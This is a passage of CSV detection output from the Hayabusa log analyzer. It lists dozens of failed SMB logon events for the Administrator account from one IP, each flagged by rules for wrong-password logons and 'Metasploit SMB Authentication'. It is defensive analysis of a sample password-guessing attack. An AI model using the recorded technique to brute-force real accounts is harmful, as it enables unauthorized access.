Password,User: Administrator : Type: 3 : Workstation: wUa03SIX69WCIYbp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.109 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.158 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zYi4TB42B2VQm5Tr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.158 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.204 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9mnUbGMnlrOR8Tv4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.204 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CJGMWqgmbXABdPvB : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.252 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2W9BbDYgC6vhqU3o : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.344 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.392 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q6DYsaih1Yhb2uOD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.392 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q4o93QpJL4pxx94q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.432 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lQf1OsHb4lpgMPbl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.476 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HcJUYelneVqBQjr9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.525 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.569 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I0d6daEeIadJRbBI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.569 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: SQ1hvZeT9aulbu4g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.612 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 75RBCjr2eRDLhTqW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.660 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.700 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: maMlpuzhleuQHhIo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.700 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.737 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AkpNfbOHUr7cY52z : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.737 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.789 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: R7SUyYbLPfPAGUfw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.789 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7clwftf7R0uNbqJ9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.845 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.883 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IsIyPcMAPnlxJa12 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.883 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4CKcyo1Ec4rs3Z2g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.928 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.973 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZlzKvZLO8CDotkbE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:46.973 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.010 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EyRpYYtmD8389Yvp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.010 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: t3Pg0H9Gncoyr45m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.060 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.112 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zksaaJ7Z1wuy4PMx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.112 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.154 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3WdYAEdfWxLdM1rh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.154 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.195 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VyYFJRy0cxPfqDFh : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.195 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Hv2Lz1h1bG6UatVR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.241 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FLKPLfEe3PpEzRNc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.288 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZJWv7ggzCSyEznOI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.336 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.381 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZUtR9CNfKMHQMd7T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.381 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.433 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6fYNHuRTqi15cRkL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.433 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.488 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DvxZHwJwrBYXlEyv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.488 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.530 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: jscJTJjhKvCtDl8q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.530 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.575 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mZEIEjcimMyHWUsp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.575 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.618 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 30OdVRH9ZATLezsR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.618 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TJ1OSBVZHKmyOzj8 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.652 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.694 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JanG6Q0oYpTdm9mC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.694 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.736 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PWCwDYL3T7TAdb0J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.736 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.777 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mRdyZaio1HjUKlNQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.777 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VjiRnExy9TzZTG0R : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.825 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ztUyQpl8c9RoAr1j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.860 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.909 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jC23QAFM07q7cfVo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.909 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.957 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: TSM8lmdOFoDslQNa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:47.957 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sGZaUGAT1oXmnGLB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.000 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.049 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZMNo21pTA67pb7Go : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.049 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.091 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EiTZCqK3m4icL1Vi : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.091 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZaZ2mnoihX1Ec4di : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.124 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ihm9zaXkmWklXk4u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.160 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.201 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yLIZ3tlw9VlQmK28 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:48.201 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
